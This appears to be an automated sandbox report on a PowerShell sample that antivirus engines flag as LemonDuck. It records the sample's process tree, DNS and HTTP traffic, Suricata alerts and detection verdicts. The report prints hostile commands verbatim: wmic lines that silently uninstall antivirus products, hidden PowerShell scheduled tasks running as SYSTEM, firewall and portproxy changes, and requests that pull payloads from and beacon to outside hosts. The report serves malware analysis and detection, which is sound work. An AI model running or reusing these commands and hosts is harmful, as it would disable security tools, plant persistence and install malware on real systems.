Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 14, 2021, 7:54 a.m. | Sept. 14, 2021, 7:56 a.m. |
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\ipc.jsp.ps1
2472-
cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
1980-
WMIC.exe wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
2168
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
2820-
WMIC.exe wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
3040
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
2836-
WMIC.exe wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
2452
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
1500-
WMIC.exe wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
2756
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
2716-
WMIC.exe wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
300
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
1560-
WMIC.exe wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
2264
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
2696-
WMIC.exe wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
2700
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
2616 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1
3164 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
3216 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD"
3280 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \802xIaZHLEP
3476 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD"
4032 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn VIl8p0azRYG\gV7HWSKROT
3628 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD"
3388 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq
3784 -
-
netsh.exe netsh.exe firewall add portopening tcp 65529 SDNSd
4392
-
-
netsh.exe "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
4620 -
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
5064 -
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
4428 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn t.pp6r1.com /F
5116 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
4292 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
3312 -
schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
1048
-
Name | Response | Post-Analysis Lookup |
---|---|---|
d.js88.ag | 104.21.28.20 | |
t.qq88.ag | 172.67.162.73 | |
t.ouler.cc | 172.67.134.190 | |
api.890.la |
CNAME
wakuang.eatuo.com
|
1.117.58.154 |
api.ipify.org | 23.21.76.7 | |
t.jusanrihua.com | 172.67.135.182 | |
t.ss700.co | 172.67.157.180 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.103:56357 -> 164.124.101.2:53 | 2027758 | ET DNS Query for .cc TLD | Potentially Bad Traffic |
TCP 192.168.56.103:49225 -> 1.117.58.154:6363 | 2027316 | ET POLICY Cryptocurrency Miner Checkin M2 | Potential Corporate Privacy Violation |
TCP 192.168.56.103:49241 -> 50.16.244.183:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49241 50.16.244.183:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.ipify.org | 6f:de:ae:2b:9f:c6:cd:5b:7f:5c:d0:69:fa:c8:8b:62:19:fd:56:ad |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://t.qq88.ag/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*700217562 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://t.ouler.cc/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*1953334123 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://d.js88.ag/if.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://d.js88.ag/m6.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://d.js88.ag/kr.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://d.js88.ag/?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://t.ss700.co/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*1723852997 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://t.qq88.ag/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74& | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://t.ouler.cc/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74& | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://t.ss700.co/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74& | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://t.jusanrihua.com/a.jsp?rep_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*583755988 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://t.jusanrihua.com/a.jsp?rep_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*232384097 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://d.js88.ag/mimi.dat?v=6f06ca&r=3 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://d.js88.ag/knil.bin?v=6f06ca&r=2 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://api.ipify.org/ |
request | GET http://t.qq88.ag/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*700217562 |
request | GET http://t.ouler.cc/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*1953334123 |
request | GET http://d.js88.ag/if.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74 |
request | GET http://d.js88.ag/m6.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74 |
request | GET http://d.js88.ag/kr.bin?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74 |
request | GET http://d.js88.ag/?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74 |
request | GET http://t.ss700.co/a.jsp?ipc_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*1723852997 |
request | GET http://t.qq88.ag/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74& |
request | GET http://t.ouler.cc/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74& |
request | GET http://t.ss700.co/report.jsp?&TEST22-PC&2C43E82A-4640-204B-882F-B25EE182DD03&94:DE:27:8C:32:74& |
request | GET http://t.jusanrihua.com/a.jsp?rep_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*583755988 |
request | GET http://t.jusanrihua.com/a.jsp?rep_20210914?TEST22-PC*TEST22-PC$*2C43E82A-4640-204B-882F-B25EE182DD03*232384097 |
request | GET http://d.js88.ag/mimi.dat?v=6f06ca&r=3 |
request | GET http://d.js88.ag/knil.bin?v=6f06ca&r=2 |
request | GET https://api.ipify.org/ |
domain | t.ouler.cc | description | Cocos Islands domain TLD |
domain | api.ipify.org |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1 |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive |
cmdline | wmic.exe product where "name like '%Security%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | wmic.exe product where "name like '%avast%'" call uninstall /nointeractive |
cmdline | wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /run /tn VIl8p0azRYG\gV7HWSKROT |
cmdline | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F |
cmdline | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F |
cmdline | wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /run /tn \802xIaZHLEP |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd |
cmdline | wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive |
cmdline | wmic.exe product where "name like '%avp%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball |
cmdline | wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq |
cmdline | "C:\Windows\system32\schtasks.exe" /delete /tn t.pp6r1.com /F |
wmi | SELECT * FROM Win32_Product WHERE name like '%avast%' |
wmi | SELECT * FROM Win32_Product WHERE name like '%avp%' |
wmi | select * from __EventFilter where Name='blackball1' |
wmi | SELECT * FROM Win32_Product WHERE name like '%AntiVirus%' |
wmi | SELECT * FROM Win32_Product WHERE name like '%Eset%' |
wmi | SELECT * FROM Win32_Product WHERE name like '%Norton Security%' |
wmi | SELECT * FROM Win32_Product WHERE name like '%%Kaspersky%%' |
wmi | SELECT * FROM Win32_Product WHERE name like '%Security%' |
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1 |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block |
cmdline | wmic.exe product where "name like '%Security%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | wmic.exe product where "name like '%avast%'" call uninstall /nointeractive |
cmdline | wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive |
cmdline | netsh.exe firewall add portopening tcp 65529 SDNSd |
cmdline | "C:\Windows\system32\schtasks.exe" /run /tn VIl8p0azRYG\gV7HWSKROT |
cmdline | "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 |
cmdline | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F |
cmdline | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F |
cmdline | wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /run /tn \802xIaZHLEP |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd |
cmdline | wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive |
cmdline | wmic.exe product where "name like '%avp%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball |
cmdline | wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive |
cmdline | "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq |
cmdline | "C:\Windows\system32\schtasks.exe" /delete /tn t.pp6r1.com /F |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1 |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball |
cmdline | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block |
cmdline | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block |
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1 | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /run /tn VIl8p0azRYG\gV7HWSKROT | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /run /tn \802xIaZHLEP | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\schtasks.exe" /delete /tn t.pp6r1.com /F |
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\cmd.exe |
file | C:\Windows\System32\schtasks.exe |
file | C:\Windows\System32\netsh.exe |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1 |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \802xIaZHLEP /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn VIl8p0azRYG\gV7HWSKROT /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\ObEKaMCF03\6UhxPVJW1Sq /F /tr "powershell -w hidden -c PS_CMD" |
cmdline | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball |
ClamAV | Ps1.Trojan.LemonDuck-9865458-0 |
CAT-QuickHeal | PS1.Agent.41699 |
ALYac | Heur.BZC.PZQ.Boxter.762.CDE52800 |
Arcabit | Heur.BZC.PZQ.Boxter.762.CDE52800 |
Symantec | ISB.Downloader!gen173 |
Kaspersky | Trojan-Dropper.PowerShell.Compressed.b |
BitDefender | Heur.BZC.PZQ.Boxter.762.CDE52800 |
MicroWorld-eScan | Heur.BZC.PZQ.Boxter.762.CDE52800 |
Ad-Aware | Heur.BZC.PZQ.Boxter.762.CDE52800 |
Emsisoft | Heur.BZC.PZQ.Boxter.762.CDE52800 (B) |
DrWeb | PowerShell.Packed.47 |
McAfee-GW-Edition | PS/Agent.eb |
FireEye | Heur.BZC.PZQ.Boxter.762.CDE52800 |
Sophos | Troj/PSDl-IK |
Microsoft | Trojan:Script/Sabsik.FL.B!ml |
ZoneAlarm | Trojan-Dropper.PowerShell.Compressed.b |
GData | Heur.BZC.PZQ.Boxter.762.CDE52800 |
McAfee | PS/Agent.eb |
MAX | malware (ai score=81) |
Tencent | Win32.Trojan-dropper.Compressed.Lqfc |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.103:49499 |
dead_host | 192.168.56.1:1433 |
dead_host | 192.168.56.103:49243 |